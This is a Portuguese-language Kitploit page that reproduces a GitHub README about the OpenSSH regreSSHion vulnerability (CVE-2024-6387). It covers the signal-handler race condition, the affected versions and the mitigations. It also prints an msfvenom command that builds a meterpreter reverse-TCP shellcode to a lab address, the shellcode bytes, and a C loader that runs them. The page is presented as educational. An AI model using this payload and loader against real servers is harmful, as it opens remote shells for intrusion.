Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6387 | Kitploit
Ferramentas/GitHubGitHub/kaleth4/cve-2024-6387
Análise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubkaleth4/cve-2024-6387

CVE-2024-6387

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
root@kitploit:~
      EXPLOIT CVE-2024-6387

💥 EXPLOIT CVE-2024-6387 (regreSSHion)

Ferramenta para análise, detecção e testes controlados da vulnerabilidade CVE-2024-6387 em servidores OpenSSH.


Bash Python Ethical


⚠️ Aviso Legal e Ético

Este repositório é exclusivamente educativo.
Use-o apenas em:

  • Laboratórios (HTB, TryHackMe)
  • Ambientes próprios
  • Auditorias com autorização explícita

⚠️ Escanear ou explorar sistemas sem permissão é ilegal.
Este conteúdo é voltado para defesa e aprendizado.


📑 Tabela de Conteúdos

  • 📖 Descrição Geral
  • 🔍 Detalhes Técnicos
  • 📊 Versões Afetadas
  • ⚙️ Uso
  • 🛠️ Mitigação
  • 📚 Referências
  • 👤 Autor
  • 📢 Disclaimer

📖 Descrição Geral

CVE-2024-6387, conhecida como regreSSHion, é uma regressão de uma vulnerabilidade previamente corrigida em 2006 (CVE-2006-5051).

Foi reintroduzida no OpenSSH 8.5p1 (2020) e permite:

  • Execução remota de código (RCE)
  • Acesso potencial como root
  • Ataque não autenticado
  • Sem interação do usuário

Também existe uma vulnerabilidade relacionada:

  • CVE-2024-6409 → afeta o processo filho em ambientes com separação de privilégios

🔍 Detalhes Técnicos

A vulnerabilidade se baseia em uma race condition no manipulador de sinais do sshd.

🧠 Funcionamento

  1. O servidor define LoginGraceTime (padrão: 120s)
  2. Se o cliente não se autenticar:
    • É disparado o sinal SIGALRM
  3. O handler executa funções não seguras para sinais, como:
    • syslog()
    • malloc()
    • free()

💣 Impacto

Isso pode provocar:

  • Corrupção de memória (heap)
  • Execução arbitrária de código

⏱️ Dificuldade de exploração

  • Requer ~10,000 tentativas (race condition)
  • Em sistemas de 32 bits:
    • Pode levar 6–8 horas
  • Fatores:
    • ASLR
    • Latência de rede
    • Carga do sistema

📊 Versões Afetadas

🛡️ OpenBSD não é vulnerável graças a proteções adicionais implementadas desde 2001. 2 1


##⚙️ Uso python3 exploit.py

🔎 Escaneamento de servidores OpenSSH

root@kitploit:~
python3 scanner.py <IP> -p 22

```bash

# Generating a shellcode 
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes

unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

Carga personalizada

root@kitploit:~
#include <stdio.h>

// A placeholder of your custom payload 
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // Execute shellcode
    printf("Executing shellcode...\n");
    void (*sc)() = (void(*)())shellcode;
    sc();

    return 0;
}

Carga atual

root@kitploit:~
#include <stdio.h>
 

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)


🛠️ Mitigação e Remediação Recomenda-se seguir estes passos de maneira urgente, especialmente em ativos expostos à Internet : Atualização Imediata: Atualizar para OpenSSH 9.8p1 ou aplicar os patches específicos de cada distribuição . Configuração do sshd: Se a atualização não for viável, defina LoginGraceTime 0 no arquivo /etc/ssh/sshd_config . Advertência: Isso previne o RCE, mas expõe o servidor a uma negação de serviço (DoS) por esgotamento de conexões . Controle de Acesso: Limitar o acesso SSH por meio de controles baseados em rede (Firewalls/VPN) e segmentação de rede para evitar movimentos laterais .

Referências

  • https://www.zscaler.com/blogs/security-research/openssh-vulnerabilities-cve-2024-6387-cve-2024-6409-pose-significant
  • https://www.exploit-db.com/exploits/52269
  • https://www.offsec.com/blog/regresshion-exploit-cve-2024-6387/
  • https://github.com/xaitax/CVE-2024-6387_Check

👤 Autor

Kaleth Corcho
Engenharia de Sistemas · WolvesTI · Bogotá, Colômbia

LinkedIn GitHub


📢 Disclaimer

  • Nota Importante:
    • Esta ferramenta é desenvolvida e utilizada exclusivamente para testes de penetração autorizados e exercícios de red team. Ela é projetada para identificar e explorar vulnerabilidades no servidor OpenSSH, em sistemas Linux baseados em glibc. O uso não autorizado desta ferramenta é estritamente proibido. O proprietário desta ferramenta não é responsável por qualquer acesso não autorizado ou uso malicioso da ferramenta.
  • Aviso Legal:
    • O uso não autorizado desta ferramenta em sistemas ou redes sem autorização explícita dos respectivos proprietários pode violar leis e regulamentos aplicáveis. Os usuários são responsáveis por garantir a conformidade com os padrões legais e éticos que regem os testes e avaliações de cibersegurança.
Baixar ferramenta
EstadoVersõesNotas
⚠️ Vulnerável< 4.4p1Se não tiverem patch antigo
✅ Seguro4.4p1 → < 8.5p1Corrigido previamente
⚠️ Vulnerável8.5p1 → < 9.8p1Regressão presente
✅ Corrigido>= 9.8p1Patch oficial